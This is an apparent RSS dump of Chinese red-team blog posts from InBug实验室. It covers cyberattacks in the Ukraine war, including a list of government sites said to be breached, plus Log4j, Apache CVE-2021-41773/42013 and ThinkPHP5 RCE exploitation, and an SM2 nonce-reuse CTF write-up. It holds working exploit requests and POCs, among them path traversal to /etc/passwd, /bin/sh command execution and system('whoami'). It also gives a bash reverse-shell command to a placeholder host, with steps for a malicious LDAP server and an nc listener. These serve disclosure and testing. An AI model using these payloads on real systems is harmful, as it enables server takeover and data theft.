InBug实验室 https://wechat2rss.xlab.app/feed/61d5b534b36746e49e6b7d52a722968eebe131a7.xml 信息安全相关信息推送,专注于红蓝对抗。 (wechat feed made by @ttttmr https://wechat2rss.xlab.app) (InBug实验室) https://wx.qlogo.cn/mmhead/Q3auHgzwzM63h3YZ2VRyzNr3GpEYfNfNQFqF5iaU8NFxhdjLxk1mOyg/0 InBug实验室 https://wechat2rss.xlab.app/feed/61d5b534b36746e49e6b7d52a722968eebe131a7.xml 开源情报收集之乌克兰局势 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247484171&idx=1&sn=3bde8ba914cbd1c7d97d144b5300dd16 俄乌战争不仅在线下影响着世界,在网络层面带来的损失很可能不亚于实际的空袭与炮击。 原创 InBug实验室 2022-02-25 16:00

俄乌战争不仅在线下影响着世界,在网络层面带来的损失很可能不亚于实际的空袭与炮击。


背景


俄乌战争不仅在线下影响着世界,在网络层面带来的损失很可能不亚于实际的空袭与炮击。

DDOS攻击让乌克兰平民断网,让乌克兰银行瘫痪的恶意软件甚至可能全球蔓延,从周四上午开始,入侵俄军带来的轰炸与枪声在乌克兰首都基辅和其他主要城市清晰可辨,同时大规模网络攻击让乌克兰政府的主要官网无法载入。在一系列DDOS攻击后,乌克兰国防部、外交部和内政部的网站对外界访问请求不能响应或加载缓慢。除此之外暗网的黑客组织在不间断的公布被黑的乌克兰政府网站数据。

本文将开源情报角度对本次冲突下的网络攻击与情报进行分析。


基于暗网的开源情报收集


根据InBug实验室暗网情报监控平台收集的情报,早在1月13日,一个名为FreeCivilian的组织在暗网主页发布了一个大小为2.5GB的乌克兰政府内政部网站(https://wanted.mvs.gov.ua/)数据库,同天还发布了大小为903G的乌克兰社区和领土发展部(http://minregion.gov.ua/)的数据邮件,在903G的文件中存在大量乌克兰政府内部邮件。

暗网截图

泄漏数据截图

该组织又于2月24发布了大小为609G的乌克兰政务在线网站(https://diia.gov.ua/)的数据文件,内包含大量乌克兰公民信息,除此之外还有五十一个乌克兰政府网站的数据已经被黑客窃取,该组织择日公布,这种大规模有组织的入侵政府网站并且公布数据实属罕见。

泄漏文件

被黑清单如下:

Ø  http://ticket.kyivcity.gov.ua

Ø  http://kmu.gov.ua

Ø  http://ticket.kyivcity.gov.ua

Ø  http://mvs.gov.ua

Ø  http://ticket.kyivcity.gov.ua

Ø  http://dsbt.gov.ua

Ø  http://ticket.kyivcity.gov.ua

Ø  http://forest.gov.ua

Ø  http://anti-violence-map.msp.gov.ua

Ø  http://nkrzi.gov.ua

Ø  http://dopomoga.msp.gov.ua

Ø  http://dabi.gov.ua

Ø  http://e-services.msp.gov.ua

Ø  http://comin.gov.ua

Ø  http://edu.msp.gov.ua

Ø  http://dp.dpss.gov.ua

Ø  http://education.msp.gov.ua

Ø  http://esbu.gov.ua

Ø  http://ek-cbi.msp.gov.ua

Ø  http://mms.gov.ua

Ø  http://mail.msp.gov.ua

Ø  http://mova.gov.ua

Ø  http://portal-gromady.msp.gov.ua

Ø  http://mspu.gov.u

Ø  http://web-minsoc.msp.gov.ua

Ø  http://nads.gov.ua

Ø  http://wcs-wim.dsbt.gov.ua

Ø  http://reintegration.gov.ua

Ø  http://bdr.mvs.gov.ua

Ø  http://sies.gov.ua

Ø  http://motorsich.com

Ø  http://sport.gov.ua

Ø  http://dsns.gov.ua

Ø  http://mepr.gov.ua

Ø  http://mon.gov.ua

Ø  http://mfa.gov.ua

Ø  http://minagro.gov.ua

Ø  http://mva.gov.ua

Ø  http://zt.gov.ua

Ø  http://mtu.gov.ua

Ø  http://cg.mvs.gov.ua

Ø  http://cg.mvs.gov.ua

Ø  http://ch-tmo.mvs.gov.ua

Ø  http://cp.mvs.gov.ua

Ø  http://cp.mvs.gov.ua

Ø  http://cpd.mvs.gov.ua

Ø  http://cpd.mvs.gov.ua

Ø  http://dndekc.mvs.gov.ua

Ø  http://hutirvilnij-mrc.mvs.gov.ua

Ø  http://visnyk.dndekc.mvs.gov.ua

Ø  http://wanted.mvs.gov.ua

Ø  http://dpvs.hsc.gov.ua

Ø  http://odk.mvs.gov.ua



基于开源情报攻击事件调查


2月23日,在俄罗斯总统普京承认顿涅茨克人民共和国和卢甘斯克人民共和国独立性两天后,多数乌克兰政府机构的网站遭到DDOS攻击。截至基辅时间16时30分,乌克兰议会、外交部、部长会议网站(包括所有个别部长网站)和乌克兰安全局网站均无法访问(乌克兰议会网站),在当地时间大约 17:10 重新上线,大多数其他网站在攻击后两小时内上线,乌克兰总统办公室的网站未遭到攻击。

在此期间乌克兰总统网站出现了一个钓鱼网站,该网站包含一个可点击的“支持总统”活动,一旦点击该活动,就会将恶意软件包下载到用户的计算机上。该活动为邀请访客“支持总统先生”,没收所有寡头的财产并与所有公民共享。


一个黄色的大按钮鼓励游客点击并签署一份请愿书,大概是为了支持这种国有化运动。邀请函的文本是用乌克兰语写的,虽然语法正确,但其语言风格为不流利的乌克兰语,经分析该网站的域名与2021年俄罗斯军事情报 (GRU) 黑客部门攻击使用的域名为同一个。


假设向数万或数十万乌克兰人部署特洛伊木马,会对乌克兰的互联网基础设施造成无法估量的损害,另一个假设结果可能与制造政治混乱和不稳定有关:诱饵信息没收所有寡头的财产与泽连斯基总统自己关于“乌克兰去寡头化”的政治信息相吻合。但是没收和再分配比泽连斯基公开支持的任何事情都要激进得多,这种提议的广泛传播可能会导致乌克兰社会的分裂和进一步的两极分化。


基于航班追踪的开源情报收集


对于开源情报调查人员来说,航班追踪是一种有用的工具,航班追踪能够追踪属于有特权的私人飞机和武装部队飞机与民用航空的运动,可以为事件调查增加重要的细节。

在了解航班追踪之前,了解一些术语很重要。下面是术语表:

呼号:呼号是飞机在飞行过程中使用的标识符。虽然私人飞机可能会使用其注册号作为呼号,但商业航班的呼号往往取决于航线。
注册编号:相当于汽车的车牌。每当一架飞机在某个管辖区注册时,它都会被分配一个注册编号。注册通常位于飞机尾部附近。飞机在哪个国家注册将部分决定其注册编号。
制造商序列号 (MSN):MSN 是分配给工厂车间每架飞机的唯一编号。如果注册是您的汽车牌照的航空等价物,那么 MSN 就像汽车制造商分配给汽车的车辆识别号。与呼号和注册不同,飞机的 MSN 不能更改。
ADS-B:ADS-B 代表“自动相关监视——广播”。正是这项技术允许开源调查人员和爱好者在网站上跟踪航班。


下面我们就以flightradar24.com为例对乌克兰上空的飞机进行追踪。

1.  协调世界时(UTC)2月18日5点30分,乌克兰领空存在11架飞行器,相比邻国飞机较少。


点击飞行器可以查看航班详情与飞行轨迹,经统计有四个航班为乌克兰国内航班,有六个国外航班。


还有一个编号为SWIFT22的未知飞行器在进行巡逻飞行,据知情人士透露SWIFT22为美军生产的全球鹰无人机。


2.  协调世界时(UTC)2月19日5点30分,乌克兰领空存在12架飞行器,点击飞行器可以查看航班详情与飞行轨迹,经统计有七个航班为乌克兰国内航班,有四个国外航班。


还有一个编号为FORTE10的美军飞行器(United States - US Air Force (USAF))飞机型号为Northrop Grumman RQ-4B Global Hawk从地中海某处空军基地起飞飞入乌克兰领空进行巡逻侦查。




3.  协调世界时(UTC)2月20日5点30分,乌克兰领空存在14架飞行器。


4.  协调世界时(UTC)2月21日5点30分,乌克兰领空存在10架飞行器。


5.  协调世界时(UTC)2月22日5点30分,乌克兰领空存在8架飞行器,均为乌克兰国内航空,已无外国航空在乌克兰领空,大部分国外航空选择绕道飞行。


6.  协调世界时(UTC)2月23日5点30分,乌克兰领空存在11架飞行器。


7.  协调世界时(UTC)2月23日2点15分乌克兰领空已无民用航空,在首都基辅有一架属于土耳其军用运输机编号TUAF600 型号为Airbus A400M-180,还有一个编号为FORTE12的美军飞行器(United States - US Air Force (USAF))飞机型号为Northrop Grumman RQ-4B Global Hawk从地中海某处空军基地起飞飞入乌克兰领空进行巡逻侦查。





时间线


从上述18日至24日的航班追踪情况来看,自乌俄冲突以来,国际大部分航班选择避开乌克兰领空飞行,只有少部分始发乌克兰的航班不得已在乌克兰领空飞行。

从19日以来美国空军全球鹰无人机都在乌克兰上空进行间接性高空侦察,在24日武装冲突前夕美国空军全球鹰无人机更是进行全境的侦查以判断战争态势,土耳其空军的运输武装冲突前夕抵达乌克兰首都基辅,疑似为乌克兰提供战备物资。



总结

从近期的观察来看,乌克兰和俄罗斯局势的升级都会伴随着相应的网络攻击,网络攻击也会一直持续,在后期可能会有民间黑客组织相互攻击,网络攻击从一定角度上来说是为了制造恐慌情绪及政治混乱导致社会不稳定,从另外一个角度上来说可摧毁网络基础设施,同时也是为冲突铺路。


阅读原文

跳转微信打开

]]> Fri, 25 Feb 2022 16:00:00 +0800 Log4j_RCE_Tool V1.0 保姆级使用教程 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247484145&idx=1&sn=491865fe9e5d623dfc80e1ad21a5a7fc 工具经过了三个版本的迭代,现在已经发布了V1.0正式版,该版本由之前版本的默认内置常见参数方式改为更科学的爬虫爬取参数,自动进行参数识别(识别登陆表单、搜索表单、以及其他常见表单等),提高了测试的准确率与覆盖率; 原创 InBug实验室 2021-12-15 11:01

工具经过了三个版本的迭代,现在已经发布了V1.0正式版,该版本由之前版本的默认内置常见参数方式改为更科学的爬虫爬取参数,自动进行参数识别(识别登陆表单、搜索表单、以及其他常见表单等),提高了测试的准确率与覆盖率;

前言


 本工具只可用于授权安全测试,请勿用于非法用途!

 工具经过了三个版本的迭代,现在已经发布了V1.0正式版,该版本由之前版本的默认内置常见参数方式改为更科学的爬虫爬取参数,自动进行参数识别(识别登陆表单、搜索表单、以及其他常见表单等),提高了测试的准确率与覆盖率。该版本还内置了六种bypass攻击载荷,进一步提高了漏洞检测率。
为了方便Mac OS用户,同时也发布了Mac版,支持M1处理器。


使用方法



一、漏洞验证

 本工具使用Rad爬虫进行参数爬取,首先Windows系统用户需要修改爬虫配置文件, rad_config.yml 文件,在exec_path处输入chrome路径,文件路径需要将路径转义如下图,Mac OS系统用户默认都是一样的无需修改。



 双击打开工具,再将自己的ceye平台的API tokenIdentifier填入对应的位置,工具采用多线程,可以输入多个目标进行检测,如果目标存在漏洞,漏洞的地址和参数将输出在检测结果框中。




二、漏洞利用

 该版本工具包含了漏洞利用模块,漏洞利用需要在公网的服务器启动一个恶意ldap服务,恶意ldap服务可以使用JNDIExploit开源项目(github自行搜索),用法为 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx ,启动恶意ldap服务后,还需在公网服务器使用NC监听一个端口,准备好后就可打开本工具,在URL中填入存在漏洞的地址,在命令框填入反弹shell命令,端口为之前NC监听端口(bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1),LDAP框填入恶意服务地址(xx.xx.xx.xx:1389),Payload填入漏洞验证时输出的参数,点击执行命令即可得到存在漏洞服务器的反弹shell。




视频演示



阅读原文

跳转微信打开

]]> Wed, 15 Dec 2021 11:01:00 +0800 Apache Log4j 远程代码执行漏洞批量检测工具 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247484130&idx=1&sn=d1480f76a8bcba32bb83aae36927451f Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 原创 InBug实验室 2021-12-11 10:34

Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

漏洞描述


     由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。


影响版本


    Apache Log4j 2.x < 2.15.0-rc2

影响范围


      含有该漏洞的Log4j影响到超过 6000个中间件或应用,目前已知的可能受影响的应用及组件包括但不限于如下清单中所列出的:

 

  • Spring-Boot-strater-log4j2

  • Apache Struts2

  • Apache Solr

  • Apache Flink

  • Apache Druid

  • ElasticSearch

  • Flume

  • Dubbo

  • Redis

  • Logstash

  • Kafka

 

验证过程


 

      靶场使用vulfocus的靶场该靶场漏洞位置存在于/hello路径漏洞验证过程使用burpsuite、JNDIExploit以及拥有公网ip的vps的服务器


  1. 漏洞检测

    首先对vulfocus的靶场进行抓取数据包。

  然后进入存在漏洞的路径,使用POST请求尝试将请求dnslog地址,通过查看dnslog上的记录查看是否执行请求。 

 

    当前ceye.io没有数据,发送构造好的POST包后,dnslog将会出现对应的解析记录。


说明漏洞存在。


2.命令执行

      首先将payload进行base64编码(注意 在注入中 需要将base64加密后的+进行url编码 ,burpsuite需要二次url编码)。

    使用靶机可远程访问的服务器,开启能够执行恶意命令的ldap服务器,这里使用JNDIExploit,JNDIExploit具体使用参数如下图。




工具使用






该工具从InScan专业版分离,包含漏洞验证功能与漏洞利用功能,在利用漏洞时候需要在公网IP上部署一个JNDI恶意服务(https://github.com/feihong-cs/JNDIExploit)
参数如下图,填入LDAP地址框,然后再使用公网IP监听端口来反弹shell。


    当然InScan专业版也集成了dnslog与自动化反弹shell功能,可全自动检测和利用 Log4j2远程代码执行漏洞,通过Log4j2自动内网横向移动。






 

工具下载


     

    关注微信公众号回复"log4j"获取下载链接。

 


 

排查方法


 

    在应用内部搜索log4j-core-*.jar以及log4j-api-*.jar两个关键字,查看其版本是否在受影响的版本范围中,同时查看其pom.xml文件内部的版本号进行二次确认。也可以通过查看内部JAVA源代码库中所引入的组件清单列表来确认是否引入了Apache Log4j 2.x的Jar包。


 

修复建议


 

1、升级Apache Log4j2所有相关应用到最新的 log4j-2.15.0-rc2 版本,地址 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

 

2、升级已知受影响的应用及组件,如srping-boot-strater-log4j2、Apache Solr、Apache Flink、Apache Druid



阅读原文

跳转微信打开

]]> Sat, 11 Dec 2021 10:34:00 +0800 Apache 2.4.49 (CVE-2021-41773) 、 2.4.50 (CVE-2021-42013) 检测工具 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247484102&idx=1&sn=9f447d49332558770c53d91f4da4215b 漏洞描述Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Ap 原创 InBug实验室 2021-10-09 14:01

漏洞描述Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Ap

漏洞描述


Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。

 


影响版本



Apache HTTPd 2.4.49/2.4.50版本


 

验证过程


 

Apache HTTPd 2.4.49 任意文件读取漏洞验证:


 

GET数据包:

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1Host: hostContent-Length: 2


Apache HTTPd 2.4.49 命令执行测试,未能成功回显命令,回显了bash报错信息。


 

POST数据包:

 

POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1Host: hostConnection: closeContent-Length: 13 echo;ifconfig



 

 

Apache HTTPd 2.4.50 命令执行测试:


 

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1Host: hostConnection: closeContent-Length: 13 echo;ifconfig


 

一个图片总结这次ApacheHTTPd 2.4.50版本修复不完善。




修复建议


    建议使用Apache HTTPd 2.4.49 与Apache HTTPd 2.4.50 版本的服务器更新Apache HTTPd 版本至最新。


 

检测工具


Apache 2.4.49 (CVE-2021-41773)

Apache 2.4.50 (CVE-2021-42013)

批量多线程检测工具:


Github地址:

https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013

 


阅读原文

跳转微信打开

]]> Sat, 09 Oct 2021 14:01:00 +0800 Thinkphp5 RCE 代码审计 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247484046&idx=1&sn=552a42f56a7ad6d134d97908374bf792 对thinkphp5 控制器过滤不严导致的RCE漏洞进行了一次审计 原创 InBug实验室 2021-08-31 18:25

对thinkphp5 控制器过滤不严导致的RCE漏洞进行了一次审计

             

前言


本着知其然,知其所以然的精神,对thinkphp5 控制器过滤不严导致的RCE漏洞进行了一次审计

POC:
/thinkphp/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1/thinkphp_5.0.22/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1/thinkphp5.0.22/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1/thinkphp5.1.29/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1/thinkphp_5.1.29/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


影响版本:thinkphp 5.0.23及以下

环境:phpstorm+xdebugThinkphp_5.0.14_fullphpstorm+xdebug环境可自行百度搭建poc: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

POC效果:


开始审计


前置知识:

入口文件:Thinkphp5的入口文件位于public目录下的index文件

跟进入口文件,先进行了一些配置加载、设置路由规则的工作

加载完之后进入start.php开始执行

Run方法:

public static function run(Request $request = null){        #初始化request对象        $request = is_null($request) ? Request::instance() : $request;
        try {            $config = self::initCommon();
            // 模块/控制器绑定            if (defined('BIND_MODULE')) {                BIND_MODULE && Route::bind(BIND_MODULE);            } elseif ($config['auto_bind_module']) {                // 入口自动绑定                $name = pathinfo($request->baseFile(), PATHINFO_FILENAME);                if ($name && 'index' != $name && is_dir(APP_PATH . $name)) {                    Route::bind($name);                }            }
            $request->filter($config['default_filter']);
            // 默认语言            Lang::range($config['default_lang']);            // 开启多语言机制 检测当前语言            $config['lang_switch_on'] && Lang::detect();            $request->langset(Lang::range());
            // 加载系统语言包            Lang::load([                THINK_PATH . 'lang' . DS . $request->langset() . EXT,                APP_PATH . 'lang' . DS . $request->langset() . EXT,            ]);
            // 监听 app_dispatch            Hook::listen('app_dispatch', self::$dispatch);            // 获取应用调度信息            $dispatch = self::$dispatch;
            // 未设置调度信息则进行 URL 路由检测            if (empty($dispatch)) {                $dispatch = self::routeCheck($request, $config);            }
            // 记录当前调度信息            $request->dispatch($dispatch);
            // 记录路由和请求信息            if (self::$debug) {                Log::record('[ ROUTE ] ' . var_export($dispatch, true), 'info');                Log::record('[ HEADER ] ' . var_export($request->header(), true), 'info');                Log::record('[ PARAM ] ' . var_export($request->param(), true), 'info');            }
            // 监听 app_begin            Hook::listen('app_begin', $dispatch);
            // 请求缓存检查            $request->cache(                $config['request_cache'],                $config['request_cache_expire'],                $config['request_cache_except']            );
            $data = self::exec($dispatch, $config);        } catch (HttpResponseException $exception) {            $data = $exception->getResponse();        }
        // 清空类的实例化        Loader::clearInstance();
        // 输出数据到客户端        if ($data instanceof Response) {            $response = $data;        } elseif (!is_null($data)) {            // 默认自动识别响应输出类型            $type = $request->isAjax() ?            Config::get('default_ajax_return') :            Config::get('default_return_type');
            $response = Response::create($data, $type);        } else {            $response = Response::create();        }
        // 监听 app_end        Hook::listen('app_end', $response);
        return $response;}

跟进run方法,首先是自动加载机制autoload加载think\app类

初始化、语言包加载、模块绑定等工作完成后开始获取调度信息dispatch未设置调度信息则进入routecheck()方法进行url检测

Routecheck方法:

public static function routeCheck($request, array $config){        $path   = $request->path();        $depr   = $config['pathinfo_depr'];        $result = false;
        // 路由检测        $check = !is_null(self::$routeCheck) ? self::$routeCheck : $config['url_route_on'];        if ($check) {            // 开启路由            if (is_file(RUNTIME_PATH . 'route.php')) {                // 读取路由缓存                $rules = include RUNTIME_PATH . 'route.php';                is_array($rules) && Route::rules($rules);            } else {                $files = $config['route_config_file'];                foreach ($files as $file) {                    if (is_file(CONF_PATH . $file . CONF_EXT)) {                        // 导入路由配置                        $rules = include CONF_PATH . $file . CONF_EXT;                        is_array($rules) && Route::import($rules);                    }                }            }
            // 路由检测(根据路由定义返回不同的URL调度)            $result = Route::check($request, $path, $depr, $config['url_domain_deploy']);            $must   = !is_null(self::$routeMust) ? self::$routeMust : $config['url_route_must'];
            if ($must && false === $result) {                // 路由无效                throw new RouteNotFoundException();            }        }
        // 路由无效 解析模块/控制器/操作/参数... 支持控制器自动搜索        if (false === $result) {            $result = Route::parseUrl($path, $depr, $config['controller_auto_search']);        }
        return $result;}

跟进routecheck()方法routecheck方法对pathinfo进行分析(tips:thinkphppathinfo格式为模块/控制器/操作/[参数名/参数值])

调用path()方法获取到url的pathinfo信息,返回path= index/think\app/invokefunction” 

格式为模块名:index  

控制器名:think\app

操作名:invokefuncton

Routecheck()方法载入路由,对比pathinfo以生成调度信息

随后进入路由检测,读取路由缓存内容、导入路由配置,随后进入check()方法根据解析的pathinfo信息与路由进行对比,因路由规则中不存在对应的路由信息,返回$result=fasle,代表路由无效,无调度信息

因为根据路由缓存检测出调度信息无效,所以进入parseURL进行URL的解析进行url的解析以再次获取调度信息

跟进parseURLparseURL中调用了parseUrlPath来解析url,此时url= “index|think\app|invokefunction” parseurlPathurl解析为数组形式,$path:{“index”,”think\app”,”invokefunction”},分别为模块、控制器、操作

ParseURL对parseURLpath返回的数组$path进行模块、控制器、操作的解析,得到结果:模块$module = “index”  控制器$controller=”think\app”  操作 $action = “invokefunction”

随后对获取的信息进行路由封装,得到$route = {“index“,”think\app”,”invokefunction”}

继续跟进,对路由进行记录、检测缓存信息,完成后进入exec()方法

Exec方法:

protected static function exec($dispatch, $config){        switch ($dispatch['type']) {            case 'redirect': // 重定向跳转                $data = Response::create($dispatch['url'], 'redirect')                    ->code($dispatch['status']);                break;            case 'module': // 模块/控制器/操作                $data = self::module(                    $dispatch['module'],                    $config,                    isset($dispatch['convert']) ? $dispatch['convert'] : null                );                break;            case 'controller': // 执行控制器操作                $vars = array_merge(Request::instance()->param(), $dispatch['var']);                $data = Loader::action(                    $dispatch['controller'],                    $vars,                    $config['url_controller_layer'],                    $config['controller_suffix']                );                break;            case 'method': // 回调方法                $vars = array_merge(Request::instance()->param(), $dispatch['var']);                $data = self::invokeMethod($dispatch['method'], $vars);                break;            case 'function': // 闭包                $data = self::invokeFunction($dispatch['function']);                break;            case 'response': // Response 实例                $data = $dispatch['response'];                break;            default:                throw new \InvalidArgumentException('dispatch type not support');        }
        return $data;}

跟进exec()方法,exec根据dispatch数组中type字段的值进入module分支,并调用module方法

跟进module方法,module方法首先对模块进行部署、初始化、缓存检查

随后module方法获取模块名index、控制器名think\app、操作名invokefunction

随后分别进入controller()方法、parseName()方法、action()方法设置控制器、操作并载入

设置并加载控制器、操作后通过is_callable()查看invokefunction是否能被调用,若不可调用则抛出404不存在

随后进入invokemethod方法

跟进invokemethodinvokemethod通过反射机制ReflectionMethod调用操作invokefunctionbindParams用于获取绑定参数 args = {“call_user_func_array”,”{system”, {“whoami”}}”}

此时通过反射机制将调用操作指定为invokefunction ,将参数绑定为args = {“call_user_func_array”,”{system”, {“whoami”}}”}

随后进入invokeargs方法,invokeargs通过反射进入invokefunction方法,在此设置反射为call_user_func_array(),绑定参数为system和whoami

再次调用invokeargs()方法,成功调用call_user_func(system(“whoami”))达到远程代码执行的目的 

退出module达到命令执行目的


总结


结合此次RCE审计流程来看,漏洞点主要是解析pathinfo的时候并没有对控制器操作进行过滤,导致恶意用户将控制器操作指向invokefunction,再结合call_user_fun_array达到了远程代码任意执行的攻击效果,通过对比thinkphp发布的补丁可以看出,thinkphp通过增加对控制器名的过滤达到修复。

阅读原文

跳转微信打开

]]> Tue, 31 Aug 2021 18:25:00 +0800 密码学竞赛SM2题目wp https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247484045&idx=1&sn=2a6dd117555f71b595f20efc6210d145 使用sm2签名时,必须保证k值的随机性,并且不能重复,一旦重复就可以被计算出私钥。 原创 InBug实验室 2021-08-31 12:05

使用sm2签名时,必须保证k值的随机性,并且不能重复,一旦重复就可以被计算出私钥。

                                                                     

背景


近期在学习国密系列算法,为巩固刚学习的SM2算法,在网上找到一个竞赛题目,让我们一起来干它!

                                                                     

题目


某信息系统基于 OpenSSL 实现了 SM2 算法,部署在客户端和服务器进行身份鉴别以及用户对数据摘要进行签名。密码分析人员采集到服务器日志,请恢复出用户签名私钥明文。

1. 开始对用户 1 进行身份鉴别2. 服务端获取用户 1 发送的公钥值 P1:04E83E542C594496D1F75A7C07841F2DE773DB59CA8A277CC77BAB2FD1BA90B8585F7CC3C9863D129D4DDFACD1B529A31CCB81463AF8A8BB5AB480A3F8BB7DA7373. 产生挑战的杂凑值 e1:875817FFC25231A88B68696273AEECE852A10CCDE93C19476482EBA4D48773224. 收到签名值(r1, s1):1260185C3D7437E6A63F1E18FD810A314A5E27D67884A83F1283D72F1009F6990E9F423B578A8707C83C1A0A3982F52D0FF718C2B481966E4D839CD566EE72095. 验签成功!身份鉴别完成。6. 收到用户 1 发送的文件杂凑值 e2:8FB2B63B9CF9ED7842CC0E0A204B36A3ED5C45936B6148646A26915120F6C7D2和对应 签名值(r2, s2):1ABAB698181BF3B65DA2C2C0AA1D53ECE519609BFAA9D75C18277CDB5C794B49EBB541CA42C5CCA5FA1324DDC32D3F352546FE4EECE8034E1D64A2848E2A93B97. 验签成功!文件与签名匹配。

                                                                     

解答


前置知识:了解扩展欧几里得算法、素域、同余、逆元等相关概念

从日志1-7中获得

e1=0x875817FFC25231A88B68696273AEECE852A10CCDE93C19476482EBA4D4877322r1=0x1260185C3D7437E6A63F1E18FD810A314A5E27D67884A83F1283D72F1009F699s1=0x0E9F423B578A8707C83C1A0A3982F52D0FF718C2B481966E4D839CD566EE7209e2=0x8FB2B63B9CF9ED7842CC0E0A204B36A3ED5C45936B6148646A26915120F6C7D2 r2=0x1ABAB698181BF3B65DA2C2C0AA1D53ECE519609BFAA9D75C18277CDB5C794B49 s2=0xEBB541CA42C5CCA5FA1324DDC32D3F352546FE4EECE8034E1D64A2848E2A93B9


GM/T0003.2- 2012中描述的签名算法如下:


由A5步骤设两次签名的r、e、x1分别为 r1、e1、x1、r2、e2、x2

得到等式 r1≡e1+x1(mod n),r2≡e2+x2(mod n)

两式相减得r1-r2≡e1-e2+x1-x2(mod n),移项得x1-x2≡(r1-r2)-(e1-e2)

e1=0x875817FFC25231A88B68696273AEECE852A10CCDE93C19476482EBA4D4877322r1=0x1260185C3D7437E6A63F1E18FD810A314A5E27D67884A83F1283D72F1009F699e2=0x8FB2B63B9CF9ED7842CC0E0A204B36A3ED5C45936B6148646A26915120F6C7D2 r2=0x1ABAB698181BF3B65DA2C2C0AA1D53ECE519609BFAA9D75C18277CDB5C794B49


代入x1-x2≡(r1-r2)-(e1-e2)得x1-x2=0,即x1=x2,x由A4步骤[k]G得来,两次x得值相等,说明两次使用的k值相等。


由A6步骤设两次签名的s分别为s1、s2,两次使用的k和dA(私钥)相同,均记为k、d,

得到等式 s1≡(1+d)-1·(k-r1·d) (mod n),s2≡(1+d)-1·(k-r2·d) (mod n)

两式相减得s1-s2≡(1+d)-1·(k-r1·d)-(1+d)-1·(k-r2·d) (mod n)

解出d的表达式为d≡(r2-r1)(r2-r1-(s1-s2))-1-1 (mod n)

 

d≡(r2-r1)(r2-r1-(s1-s2))-1-1 (mod n)不等价于d≡(r2-r1)/(r2-r1-(s1-s2))-1 (mod n),

设m=r2-r1-(s1-s2),

m-1为m在模n的域中的逆元,使用扩展欧几里得算法,以下python代码摘自百度百科,

 def ext_euclid(a, b):         if b == 0:                 return 1, 0, a         else:                 x, y, q = ext_euclid(b, a % b)                x, y = y, (x - (a // b) * y)                 return x, y, q

稍加修改,我们仅需要返回值中的x,将等式d≡(r2-r1)(r2-r1-(s1-s2))-1-1 (mod n)写成python代码如下:

d=((r2-r1)*ext_euclid(r2-r1-(s1-s2),n)[0]-1) % n


 

r1、r2、s1、s2均已知,模数n未知。实际上sm2在用于签名时并未交换n,a,b,p等参数,但是这些参数双方保持一致才能进行签名和验签,所以n,a,b,p参数应该存在默认值,于是我在python的gmssl库的sm2算法中找到了这些默认值:

n=0xFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFF7203DF6B21C6052B53BBF40939D54123


 

完整python代码:

 

e1=0x875817FFC25231A88B68696273AEECE852A10CCDE93C19476482EBA4D4877322r1=0x1260185C3D7437E6A63F1E18FD810A314A5E27D67884A83F1283D72F1009F699s1=0x0E9F423B578A8707C83C1A0A3982F52D0FF718C2B481966E4D839CD566EE7209e2=0x8FB2B63B9CF9ED7842CC0E0A204B36A3ED5C45936B6148646A26915120F6C7D2 r2=0x1ABAB698181BF3B65DA2C2C0AA1D53ECE519609BFAA9D75C18277CDB5C794B49 s2=0xEBB541CA42C5CCA5FA1324DDC32D3F352546FE4EECE8034E1D64A2848E2A93B9n=0xFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFF7203DF6B21C6052B53BBF40939D54123def ext_euclid(a, b):         if b == 0:                 return 1, 0, a         else:                 x, y, q = ext_euclid(b, a % b)                x, y = y, (x - (a // b) * y)                 return x, y, q
d=((r2-r1)*ext_euclid(r2-r1-(s1-s2),n)[0]-1) % nprint(hex(d))


解出私钥d为:

0x3b90f86f263049adbae06cbb1e2f8efef2142f2cc4979050a3d3109df7d83714


 

                                                                     

总结


